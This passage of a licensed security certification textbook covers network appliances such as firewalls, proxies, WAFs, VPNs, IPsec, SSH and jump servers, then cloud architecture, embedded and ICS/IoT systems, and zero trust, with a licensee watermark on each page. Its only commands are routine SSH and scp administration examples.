instance. As another example, a web application firewall could analyze the HTTP
headers and the webpage formatting code present in HTTP packets to identify
strings that match a pattern in its threat database.
Application-aware firewalls have many different names, including application layer
gateway, stateful multilayer inspection, and deep packet inspection. Application-
aware devices have to be configured with separate filters for each type of traffic
(HTTP and HTTPS, SMTP/POP/IMAP, FTP, and so on).
Proxy Servers
A firewall that performs application layer filtering is likely implemented as a proxy.
Where a network firewall only accepts or blocks traffic, a proxy server works on a
store-and-forward model. The proxy deconstructs each packet, performs analysis,
then rebuilds the packet and forwards it on, providing it conforms to the rules.
The amount of rebuilding depends on the proxy. Some proxies only manipulate the
IP and TCP headers. Application-aware proxies might add or remove HTTP headers.
A deep packet inspection proxy might be able to remove content from an HTTP
payload.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Configuring filter settings for the caching proxy server running on OPNsense. The filter can apply
ACLs to prohibit access to IP addresses and URLs. (Screenshot courtesy of OPNsense.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Configuring transparent proxy settings for the proxy server running on OPNsense. The proxy
uses its own certificate to intercept secure connections and inspect the URL.
(Screenshot courtesy of OPNsense.)
Sensors
A network intrusion system captures traffic via a packet sniffer, referred to as a
sensor. The sensor could use a SPAN/mirror port or an inline TAP. Typically, the
packet capture sensor is placed behind a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to get
past the firewall. A single sniffer can record a large amount of traffic data so you
cannot put multiple sensors everywhere in the network without provisioning the
resources to manage them properly. Depending on network size and resources,
one or a few sensors are deployed to monitor key assets or network paths.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Viewing an intrusion detection alert generated by Snort in the Kibana app on Security Onion.
(Screenshot courtesy of Security Onion https://securityonionsolutions.com.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
To some extent, NGFW and UTM are just marketing terms. UTM is commonly deployed
in small and medium-sized businesses that require a comprehensive security solution
but have limited resources and IT expertise. A UTM is seen as a turnkey "do everything"
solution, while a NGFW is an enterprise product with fewer features but better
performance.
Load Balancers
A load balancer distributes client requests across available server nodes in a
farm or pool. This is used to provision services that can scale from light to heavy
loads and to provide mitigation against denial of service attacks. A load balancer
also provides fault tolerance. If there are multiple servers available in a farm all
addressed by a single name/IP address via a load balancer, then if a single server
fails, client requests can be forwarded to another server in the farm.
A load balancer can be deployed in any situation where there are multiple
servers providing the same function. Examples include web servers, front-end
email servers, web conferencing, video conferencing, and streaming media
servers.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Scheduling
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling
is called round robin; this means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each
method can be weighted using administrator-set preferences or dynamic load
information, or both.
The load balancer must also use some type of heartbeat or health check probe to
verify whether each node is available and under load or not. Layer 4 load balancers
can only make basic connectivity tests while layer 7 appliances can test the
application’s state and verify host availability.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
With the ModSecurity WAF installed to this IIS server, a scanning attempt has been detected
and logged as an Application event. As you can see, the default ruleset generates a lot of events.
(Screenshot used with permission from Microsoft.)
A WAF may be deployed as an appliance protecting the zone that the web server is
placed in or as plug-in software for a web server platform.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Network Security Appliances
7
1. True or False? As they protect data at the highest layer of the protocol
stack, application-based firewalls have no basic packet filtering
functionality.
4. What IPS mechanism can be used to block traffic that violates policy
without also blocking the traffic source?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 5C
Secure Communications
7
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A VPN can also be deployed in a site-to-site model to connect two or more private
networks. Whereas remote access VPN connections are typically initiated by the
client, a site-to-site VPN is configured to operate automatically. The gateways
exchange security information using whichever protocol the VPN is based on.
This establishes a trust relationship between the gateways and sets up a secure
connection through which to tunnel data. Hosts at each site do not need to be
configured with any information about the VPN. The routing infrastructure at each
site determines whether to deliver traffic locally or send it over the VPN tunnel.
Several VPN protocols have been used over the years. Legacy protocols such as the
Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do
not offer adequate security. Transport Layer Security (TLS) and Internet Protocol
Security (IPsec) are now the preferred options for configuring VPN access.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Configuring an OpenVPN server in the OPNsense security appliance. This configuration creates
a remote access VPN. Users are authenticated via a RADIUS server on the local network.
(Screenshot courtesy of OPNsense.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A TLS VPN can use either TCP or UDP. UDP might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video.
TCP might be easier to use with a default firewall policy. TLS over UDP is also referred to
as Datagram TLS (DTLS).
It is important to use a secure version of TLS. The latest version at the time of writing is
TLS 1.3. TLS 1.2 is also still supported. Versions earlier than this are deprecated.
• Encapsulating Security Payload (ESP) can be used to encrypt the packet rather
than simply calculating an ICV. ESP attaches three fields to the packet: a header,
a trailer (providing padding for the cryptographic function), and an Integrity
Check Value. Unlike AH, ESP excludes the IP header when calculating the ICV.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Configuring a site-to-site VPN using IPsec tunneling with ESP encryption in the OPNsense
security appliance. (Screenshot courtesy of OPNsense.)
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
2. Phase II uses the secure channel created in Phase I to establish which ciphers
2.
and key sizes will be used with AH and/or ESP in the IPsec session.
There are two versions of IKE. Version 1 was designed for site-to-site and host-to-
host topologies and requires a supporting protocol to implement remote access
VPNs. IKEv2 has some additional features that have made the protocol popular for
use as a stand-alone remote access client-to-site VPN solution. The main changes
are the following:
• Supports EAP authentication methods, allowing, for example, user
authentication against a RADIUS server.
Remote Desktop
A remote access VPN joins the user’s PC or smartphone to a remote private network
via a secure tunnel over a public network. Remote access can also be a means
of connecting to a specific computer over a network. This type of remote access
involves connecting to a terminal server on a host using software that transfers
shell data only. The connection could be a client and terminal server on the same
local network or across remote networks.
A graphical remote access tool sends screen and audio data from the remote host
to the client and transfers mouse and keyboard input from the client to the remote
host. Microsoft’s Remote Desktop Protocol (RDP) can be used to access a physical
machine on a one-to-one basis.
Alternatively, a site can operate a remote desktop gateway that facilitates access
to virtual desktops or individual apps running on the network servers. RDP
connections are encrypted by default. There are several popular alternatives to
Remote Desktops. Most support remote access to platforms other than Windows
(macOS and iOS, Linux, Chrome OS, and Android, for instance). Examples include
TeamViewer (teamviewer.com/en) and Virtual Network Computing (VNC), which
is implemented by several different providers (notably realvnc.com/en).
In the past, these remote desktop products required a dedicated client app.
Remote desktop access can now just use a web browser client. The canvas element
introduced in HTML5 allows a browser to draw and update a desktop with relatively
little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a
clientless remote desktop gateway (guacamole.apache.org). This solution uses a
protocol called WebSocket, which enables bidirectional messages to be sent between
the server and client without requiring the overhead of separate HTTP requests.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Secure Shell
Secure Shell (SSH) is the principal means of obtaining secure remote access to a
command line terminal. The main uses of SSH are for remote administration and
secure file transfer (SFTP). Numerous commercial and open-source SSH products
are available for all the major NOS platforms. The most widely used is OpenSSH
(openssh.com).
SSH servers are identified by a public/private key pair that is referred to as the
host key. Host names can be mapped to host keys manually by each SSH client,
or through various enterprise software products designed for SSH host key
management.
Confirming the SSH server’s host key using the PuTTY SSH client. (Screenshot used
with permission from PuTTY.)
The host key must be changed if any compromise of the host is suspected. If an attacker
has obtained the private key of a server or appliance, they can masquerade as that
server or appliance and perform a spoofing attack, usually with a view to obtaining
other network credentials.
The server’s host key is used to set up a secure channel to use for the client to
submit authentication credentials.
• Public key authentication—is when each remote user’s public key is added to a
list of keys authorized for each local account on the SSH server.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Kerberos—is when the client submits the Kerberos credentials (a Ticket Granting
Ticket) obtained when the user logs onto the workstation to the server using the
Generic Security Services Application Program Interface (GSSAPI). The SSH server
contacts the Ticket Granting Service (in a Windows environment, this will be a
domain controller) to validate the credentials.
Managing valid client public keys is a critical security task. Many recent attacks on web
servers have exploited poor key management. If a user's private key is compromised,
delete the public key from the appliance and then regenerate the key pair on the user's
(remediated) client device and copy the public key to the SSH server. Always delete
public keys when the user's access permissions have been revoked.
SSH Commands
SSH commands are used to connect to hosts and set up authentication methods.
To connect to an SSH server at 10.1.0.10 using an account named “bobby” and
password authentication, run:
ssh [email protected]
The following commands create a new key pair and copy it to an account on the
remote server:
ssh-keygen -t rsa
ssh-copy-id [email protected]
At an SSH prompt, you can now use the standard Linux shell commands. Use exit
to close the connection.
You can use the scp command to copy a file from the remote server to the local
host:
scp [email protected]:/logs/audit.log audit.log
Reverse the arguments to copy a file from the local host to the remote server. To copy
the contents of a directory and any subdirectories (recursively), use the -r option.
Out-of-Band Management
Remote management methods are either in-band or out-of-band (OOB). An
in-band management link shares traffic with other communications on the
production network. The connection method must use TLS, IPsec, RDP, or
SSH encrypted sessions to ensure confidentiality and integrity.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Jump Servers
One of the challenges of managing hosts exposed to the Internet, such as in a
screened subnet or cloud network, is providing administrative access to the servers
and appliances located within it. On the one hand, a link is necessary; on the
other, the administrative interface could be compromised and exploited as a pivot
point into the rest of the network. Consequently, management of hosts permitted
to access administrative interfaces on hosts in the secure zone must be tightly
controlled. Configuring and auditing this type of control when there are many
different servers operating in the zone is complex.
One solution to this complexity is to add a single administration server, or jump
server, to the secure zone. The jump server only runs the necessary administrative
port and protocol, such as SSH or RDP. Administrators connect to the jump server
and then use the jump server to connect to the admin interface on the application
server. The application server’s admin interface has a single entry in its ACL (the
jump server) and denies connection attempts from any other hosts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Secure Communications
8
1. True or false? A TLS VPN can only provide access to web-based network
resources.
2. What IPsec mode would you use for data confidentiality on a private
network?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 5
Summary
6
• Deploy switching and routing appliances and protocols to support each block,
accounting for port security or 802.1X network access control (NAC).
• Analyze the attack surface and select effective controls deployed to appropriate
network locations:
• Deploy port security or 802.1X NAC to mitigate risks from rogue devices
attached to physical network ports.
• Consider the use of proxy servers, NGFW, and WAF for advanced application
and user-aware filtering.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Cloud network architecture encompasses a range of concepts and technologies
designed to ensure the confidentiality, integrity, and availability of data and
applications within cloud-based environments. Cloud architecture and modern
software deployment practices enable seamless integration, management, and
optimization of resources within cloud-based environments. Key features include
on-demand provisioning, elasticity, and scalability, which allow rapid deployment
and dynamic adjustments to computing, storage, and network resources as
required.
Additionally, multi-tenancy and virtualization technologies enable efficient resource
sharing and isolation among diverse users and workloads. Cloud architecture
also employs load balancing and auto-scaling to distribute workloads evenly and
maintain high availability and performance. Furthermore, hybrid and multi-cloud
strategies allow organizations to leverage various cloud service providers, reducing
vendor lock-in and promoting a more resilient and cost-effective infrastructure.
Lesson Objectives
In this lesson, you will do the following:
• Summarize secure cloud and virtualization services.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 6A
Cloud Infrastructure
2
• Hosted Private—is hosted by a third party for the exclusive use of the
organization. This is more secure and can guarantee better performance but is
correspondingly more expensive.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
There will also be cloud computing solutions that implement a hybrid public/
private/community/hosted/on-site/off-site solution. For example, a travel
organization may run a sales website for most of the year using a private cloud but
break out the website to a public cloud when much higher utilization is forecast.
Flexibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.
Security Considerations
Different cloud architecture models have varying security implications to consider
when deciding which one to use.
• Single-tenant architecture—provides dedicated infrastructure to a single
customer, ensuring that only that customer can access the infrastructure. This
model offers the highest level of security as the customer has complete control
over the infrastructure. However, it can be more expensive than multi-tenant
architecture, and the customer is responsible for managing and securing the
infrastructure.
Hybrid Cloud
A hybrid cloud most commonly describes a computing environment combining
public and private cloud infrastructures, although any combination of cloud
infrastructures constitutes a hybrid cloud. In a hybrid cloud, companies can store
data in a private cloud but also leverage the resources of a public cloud when
needed. This allows for greater flexibility and scalability, as well as cost savings. A
hybrid cloud is commonly used because it enables companies to take advantage
of the benefits of both private and public clouds. Private clouds can provide
greater security and control over data, while public clouds offer more cost-effective
scalability and access to a broader range of resources. A hybrid cloud also allows
for a smoother transition to the cloud for companies that may need more time to
migrate all of their data.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Software as a Service
Software as a service (SaaS) is a model of provisioning software applications.
Rather than purchasing software licenses for a given number of seats, a business
accesses software hosted on a supplier’s servers on a pay-as-you-go or lease
arrangement (on-demand). The virtual infrastructure allows developers to provision
on-demand applications much more quickly than previously. The applications
are developed and tested in the cloud without the need to test and deploy on
client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/
microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).
Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS
and IaaS. A typical PaaS solution would provide servers and storage network
infrastructure (as per IaaS) but also provide a multi-tier web application/database
platform on top. This platform could be based on Oracle and MS SQL or PHP and
MySQL. Examples include Oracle Database (oracle.com/database), Microsoft Azure
SQL Database (azure.microsoft.com/services/sql-database), and Google App Engine
(cloud.google.com/appengine).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Distinct from SaaS, this platform would not be configured to do anything. Your
developers would create the software (the CRM or e‑commerce application) that
runs using the platform. The service provider would be responsible for the integrity
and availability of the platform components, and you would be responsible for the
security of the application you created on the platform.
Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such
as servers, load balancers, and storage area network (SAN) components quickly.
Rather than purchase these components and the Internet links they require, you
rent them as needed from the service provider’s datacenter. Examples include
Amazon Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual
Machines (azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.
com/cloud), and OpenStack (openstack.org).
Third-Party Vendors
Third-party vendors are external entities that provide organizations with goods,
services, or technology solutions. In cloud computing, third-party vendors refer to
the providers offering cloud services to businesses using infrastructure-, platform-,
or software-as-a-service models. As a third party, careful consideration regarding
cloud service provider selection, contract negotiation, service performance,
compliance, and communication practices is paramount. Organizations must adopt
robust vendor management strategies to mitigate cloud platform risks, ensure
service quality, and optimize cloud deployments. Service-level agreements (SLAs)
are contractual agreements between organizations and cloud service providers that
outline the expected levels of service delivery. SLAs define metrics, such as uptime,
performance, and support response times, along with penalties or remedies if
service levels are not met. SLAs provide a framework to hold vendors accountable
for delivering services at required performance levels.
Organizations must assess the security practices implemented by vendors to
protect their sensitive data, including data encryption, access controls, vulnerability
management, incident response procedures, and regulatory compliance, and are
responsible for ensuring compliance with data privacy requirements, especially
if they handle personally identifiable information (PII) or operate in regulated
industries. Vendor lock-in makes switching to alternative vendors or platforms
challenging or impossible, and so organizations must carefully evaluate data
portability, interoperability, and standardization to mitigate vendor lock-in risks.
Strategies like multi-cloud or hybrid cloud deployments can provide flexibility and
reduce reliance on a single vendor.
Responsibility Matrix
When using cloud infrastructure, security risks are not transferred but shared
between the cloud provider and the customer. The cloud provider is responsible
for securing the underlying infrastructure while the customer is responsible for
securing their applications and data. Choosing a cloud provider that offers robust
security features such as encryption, access controls, and network security is
important.
The shared responsibility model describes the balance of responsibility between a
customer and a cloud service provider (CSP) for implementing security in a cloud
platform. The division of responsibility becomes more or less complicated based on
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
whether the service model is SaaS, PaaS, or IaaS. For example, in a SaaS model, the
CSP performs the operating system configuration and control as part of the service
offering. In contrast, operating system security is shared between the CSP and the
customer in an IaaS model. A responsibility matrix sets outs these duties in a
clear, tabular format:
Responsibility model
Identifying the boundary between customer and cloud provider responsibilities, in terms
of security, is imperative for reducing the risk of introducing vulnerabilities into your
environment.
In general terms, the responsibilities of the customer and the cloud provider
include the following areas:
Cloud Service Provider
• Physical security of the infrastructure
• Configuring the geographic location for storing data and running services
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Replication
Data replication allows businesses to copy data to where it can be utilized
most effectively. The cloud may be used as a central storage area, making
data available among all business units. Data replication requires low latency
network connections, security, and data integrity. CSPs offer several data storage
performance tiers (cloud.google.com/storage/docs/storage-classes). The terms
“hot storage” and “cold storage” refer to how quickly data is retrieved. Hot storage
retrieves data more quickly than cold, but the quicker the data retrieval, the higher
the cost.
Different applications have diverse replication requirements. A database generally
needs low-latency, synchronous replication, as a transaction often cannot be
considered complete until it has been made on all replicas. A mechanism to
replicate data files to backup storage might not have such high requirements,
depending on the criticality of the data.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cloud Architecture
Serverless Computing
Serverless computing is a cloud computing model in which the cloud provider
manages the infrastructure and automatically allocates resources as needed,
charging only for the actual usage of the application. In this approach, organizations
do not need to manage servers and other infrastructure, allowing them to focus on
developing and deploying applications.
Some examples of serverless computing applications include chatbots designed
to simulate conversations with human users to automate customer support, sales,
marketing tasks, and mobile backends. These are comprised of the server-side
components of mobile applications designed to provide data processing, storage,
communication services, and event-driven processing that respond to events or
triggers in real time such as sensor readings, alerts, or other similar events. Major
cloud providers like Amazon Web Services (AWS), Microsoft Azure, and Google
Cloud offer serverless computing capabilities, making it easier for organizations to
leverage this technology. Serverless computing provides a scalable, cost-effective,
and easy-to-manage infrastructure for event-driven and data-processing tasks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
With serverless, all the architecture is hosted within a cloud, but unlike “traditional”
virtual private cloud (VPC) offerings, services such as authentication, web
applications, and communications aren’t developed and managed as applications
running on VM instances within the cloud. Instead, the applications are developed
as functions and microservices, each interacting with other functions to facilitate
client requests. Billing is based on execution time rather than hourly charges.
Examples of this type of service include AWS Lambda (aws.amazon.com/lambda),
Google Cloud Functions (cloud.google.com/functions), and Microsoft Azure
Functions (azure.microsoft.com/services/functions).
Serverless platforms eliminate the need to manage physical or virtual server
instances, so there is little to no management effort for software and patches,
administration privileges, or file system security monitoring. There is no
requirement to provision multiple servers for redundancy or load balancing. As all
of the processing is taking place within the cloud, there is little emphasis on the
provision of a corporate network. The service provider manages this underlying
architecture. The principal network security job is to ensure that the clients
accessing the services have not been compromised.
Serverless architecture depends heavily on event-driven orchestration to facilitate
operations. For example, multiple services are triggered when a client connects
to an application. The application needs to authenticate the user and device,
identify the location of the device and its address properties, create a session,
load authorizations for the action, use application logic to process the action,
read or commit information from a database, and log the transaction. This
design logic differs from applications written in a “monolithic” server-based
environment.
Microservices
Microservices is an architectural approach to building software applications as
a collection of small and independent services focusing on a specific business
capability. Each microservice is designed to be modular, with a well-defined
interface and a single responsibility. This approach allows developers to build and
deploy complex applications more efficiently by breaking them down into smaller,
more manageable components.
Microservices also enable teams to work independently on different application
features, making it easier to scale and update individual components without
affecting the entire system. Overall, microservices promise to help organizations
build more agile, scalable, and resilient applications that adapt quickly to changing
business needs. Risks associated with this model are largely attributed to
integration issues. While individual components operate well independently,
they often reveal problems difficult to isolate and resolve once they are
integrated.
Microservices and Infrastructure as Code (IaC) are related technologies, and
Microservices architecture is often implemented using IaC practices. Using IaC,
developers can define and deploy infrastructure as code, ensuring consistency
and repeatability across different environments. This allows for more efficient
development and deployment of microservices since developers can independently
automate the provisioning and deploying infrastructure for each microservice.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Transformational Changes
Cloud computing offers many unique architectural services that differ from
traditional on-premises services. Cloud-native services allow organizations to
scale, innovate, and optimize their operations like never before. Important cloud
architectural services include offerings like elastic compute and auto-scaling, which
enable dynamic shifts in computing power in response to demand fluctuations.
Other services, such as serverless computing, significantly change application
development practices by abstracting traditional server resources.
Additionally, Cloud platforms provide advanced content delivery networks (CDN)
that optimize web traffic by caching content, and object storage provides massive,
unstructured data storage services that often replace traditional file servers.
Identity and access management tools provide advanced security features and
enable new methods of platform integration, while containerization and container
orchestration tools are changing how applications are deployed and managed. AI
and machine learning services, serverless databases, backend IoT services, and big
data analytics capabilities further expand the range of possibilities for organizations
utilizing the cloud. These cloud architectural services provide unprecedented
potential to large and small organizations. However, while these services are
undoubtedly driving transformative innovation, the rate of change and unfamiliar
risks present in cloud platforms fuel significant new security issues and record-
breaking data breaches.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Responsiveness
Load balancing, edge computing, and auto-scaling are critical mechanisms to
ensure responsiveness, improve performance, and effectively handle fluctuating
workloads.
• Load Balancing—Distributes network traffic across multiple servers or services
to improve performance and provide high availability. In the cloud, load
balancers are intermediaries (proxies) between users and back-end resources
like virtual machines or containers. They distribute incoming requests to
different resources using sophisticated algorithms and handle server capacity,
response time, and workload.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Considerations
Cost—should focus on solutions that best achieve operational goals while
maintaining the confidentiality, integrity, and availability of data, not simply cost
in cloud adoption. There are several cost models associated with running services
in the cloud, such as consumption-based or subscription-based, and most cloud
providers have tools designed to help estimate costs for migrating existing
workloads from on-premises to cloud. Using cloud services involves a shift from
capital expenses (CapEx) to operational expenses (OpEx). CapEx includes up-front
costs for purchasing hardware, software licenses, and infrastructure setup in
traditional on-premises IT infrastructure.
In contrast, cloud services are typically paid on a pay-as-you-go basis, allowing
organizations to convert CapEx into OpEx. Cloud services charge for usage and
resource consumption, eliminating the need for significant up-front investments.
This OpEx model provides flexibility, scalability, and cost optimization as
organizations pay only for the resources they use, making cloud services more cost-
effective from the viewpoint that they align expenses with actual usage. However,
resources not optimized to run on cloud infrastructure can present significant
challenges to the benefits this model advertises and generate overbearing recurring
costs.
Scalability—is one of the most valuable and compelling features of cloud
computing. It is the ability to dynamically expand and contract capacity in response
to demand with no downtime. There are two basic ways in which services can be
scaled. Scale-up (vertical scaling) describes adding capacity to an existing resource,
such as a processor, memory, and storage capacity. Scale-out (horizontal scaling)
describes adding additional resources, such as more instances (or virtual machines)
to work in parallel and increase performance.
Resilience—Cloud providers use redundant hardware, fault tolerance
capabilities(such as clustering), and data replication to store data across multiple
servers and datacenters, ensuring that data remains available if one server or
datacenter fails.
Ease of deployment—Cloud features supporting ease of deployment include
automation, standardization, and portability.
• Automating the deployment and management of cloud resources reduces
the need for manual intervention and is often achieved using configuration
management, container orchestration, and infrastructure as code.
• Portability ensures that applications and services can be easily moved between
different cloud infrastructures, avoiding vendor lock-in and providing greater
flexibility.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
SLA and ISA—Service level agreements (SLAs) define expected service levels,
including performance, availability, and support commitments between cloud
service providers and organizations. It is essential to carefully review and negotiate
SLAs to ensure they align with business requirements and adequately protect the
organization’s interests. Interconnection Security Agreements (ISAs) establish the
security requirements and responsibilities between the organization and the cloud
service provider to safeguard sensitive data and ensure compliance with industry
regulations to help ensure the confidentiality, integrity, and availability of data and
systems within the cloud environment. ISAs help ensure data and system protection
within the cloud environment and define encryption methods, access controls,
vulnerability management, and data segregation techniques. The agreement
must also specify data ownership, audit rights, and data backup, recovery, and
retention procedures. Regulated industries must ensure that their cloud service
provider complies with relevant regulations, such as GDPR, HIPAA, or PCI DSS, and
the ISA must detail how the provider meets these compliance requirements and
include provisions for auditing and reporting to demonstrate ongoing compliance.
Additionally, the ISA should address the use of subcontractors and clearly define
the security responsibilities and requirements for their selection and the process
for notifying the organization of subcontractor changes.
Disaster recovery planning is still essential and should include procedures for restoring
critical systems, data, and applications and communicating with customers and other
stakeholders. Additionally, testing and validation, service-level agreements, and incident
response procedures must all be carefully considered when evaluating the ease of
recovery of cloud infrastructure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Cloud Infrastructure
3
4. What is IaC?
4.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 6B
Embedded Systems and Zero Trust
Architecture
5
Embedded Systems
Embedded systems are used in various specialized applications, including
consumer electronics, industrial automation, automotive systems, medical devices,
and more. Some examples include the following:
• Home appliances—Such as refrigerators, washing machines, and coffee
makers, contain embedded systems that control their functions and operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Examples of RTOS
The VxWorks operating system is commonly used in aerospace and defense
systems. VxWorks provides real-time performance and reliability and is therefore
well suited for use in aircraft control systems, missile guidance systems, and other
critical defense systems. Another example of an RTOS is FreeRTOS, an open-source
operating system used in many embedded systems, such as robotics, industrial
automation, and consumer electronics.
In the automotive industry, RTOS is used in engine control, transmission control,
and active safety systems applications. For example, the AUTOSAR (Automotive
Open System Architecture) standard defines a framework for developing
automotive software, including using RTOS for certain applications. In medical
devices, RTOS is used for applications such as patient monitoring systems, medical
imaging, and automated drug delivery systems.
In industrial control systems, RTOS is used for process control and factory
automation applications. For example, the Siemens SIMATIC WinCC Open
Architecture system uses an RTOS to provide real-time performance and reliability
for industrial automation applications.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
ICS/SCADA Applications
These types of systems are used within many sectors of industry:
• Energy refers to power generation and distribution. More widely, utilities include
water/sewage and transportation networks.
• Industrial can refer specifically to mining and refining raw materials, involving
hazardous high heat and pressure furnaces, presses, centrifuges, pumps, and
so on.
• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
Embedded technology is used in control of automated transport and lift systems
plus sensors for component tracking.
ICS/SCADA was historically built without regard to IT security, though there is now
high awareness of the necessity of enforcing security controls to protect them,
especially when they operate in a networked environment.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
ICS and SCADA systems control and monitor critical processes and operational
technologies, making them attractive targets for attackers. The consequences
of attacks range from widespread power outages and environmental damage
to economic losses and even loss of life. Malware, ransomware, unauthorized
access, and targeted attacks pose significant risks to ICS and SCADA systems, and
robust cybersecurity protections, including network segmentation, access controls,
intrusion detection systems, encryption, and continuous monitoring, are essential
to safeguarding these critical systems.
Internet of Things
The Internet of Things (IoT) refers to the network of physical devices, vehicles,
appliances, and other objects embedded with sensors, software, and connectivity,
enabling them to collect and exchange data.
Sensors are small devices designed to detect changes in the physical environment,
such as temperature, humidity, and motion. On the other hand, actuators can
perform actions based on data collected by sensors, such as turning on a light
or adjusting a thermostat. IoT devices communicate with each other and with
other (often public cloud-based) systems over the Internet to exchange data and
receive instructions. Cloud-based systems form an essential component of IoT
infrastructures as they provide the computational power needed to perform data
analytics on the large amounts of data generated by IoT devices.
IoT Examples
There are many IoT devices and applications in use today. For example, smart
homes often use IoT sensors and actuators to control lighting, temperature,
and security systems, allowing homeowners to monitor and adjust their homes
remotely. Smart cities also use IoT to manage traffic, monitor air quality, and
improve public safety. In the healthcare industry, IoT devices such as wearables
and implantable devices can collect data on patient health and send it to
healthcare providers for analysis. In agriculture, IoT sensors are used to monitor
soil conditions, weather patterns, and crop growth, helping farmers make more
informed decisions about planting and harvesting. IoT devices are used to improve
efficiency, convenience, and quality of life in a wide range of industries and
applications.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
IoT devices often have poor security characteristics for several reasons. IoT devices
are typically designed to focus on functionality rather than security and have
limited processing power and memory, making it difficult to implement strong
security controls. Many IoT devices must be low cost, making it challenging for
manufacturers to prioritize security features in their design and development
process. Many IoT devices are rushed to market without proper security testing,
resulting in vulnerabilities that cybercriminals can exploit.
Additionally, consumers and organizations need more awareness of the security
risks associated with IoT devices. Many users and organizations do not realize that
their devices are vulnerable to cyberattacks and may not take the necessary steps
to protect themselves, such as changing default passwords or updating firmware.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Deperimeterization
Deperimeterization refers to a security approach that shifts the focus from
defending a network’s boundaries to protecting individual resources and data
within the network. As organizations adopt cloud computing, remote work,
and mobile devices, traditional perimeter-based security models become less
effective in addressing modern threats. Deperimeterization concepts advocate
for implementing multiple security measures around individual assets, such as
data, applications, and services. This approach includes robust authentication,
encryption, access control, and continuous monitoring to maintain the security
of critical resources, regardless of their location.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Policy-driven access control describes how access control policies are used to
enforce access restrictions based on user identity, device posture, and network
context.
Device posture refers to the security status of a device, including its security
configurations, software versions, and patch levels. In a security context, device posture
assessment involves evaluating the security status of a device to determine whether it
meets certain security requirements or poses a risk to the network.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
The control plane manages policies that dictate how users and devices are
authorized to access network resources. It is implemented through a centralized
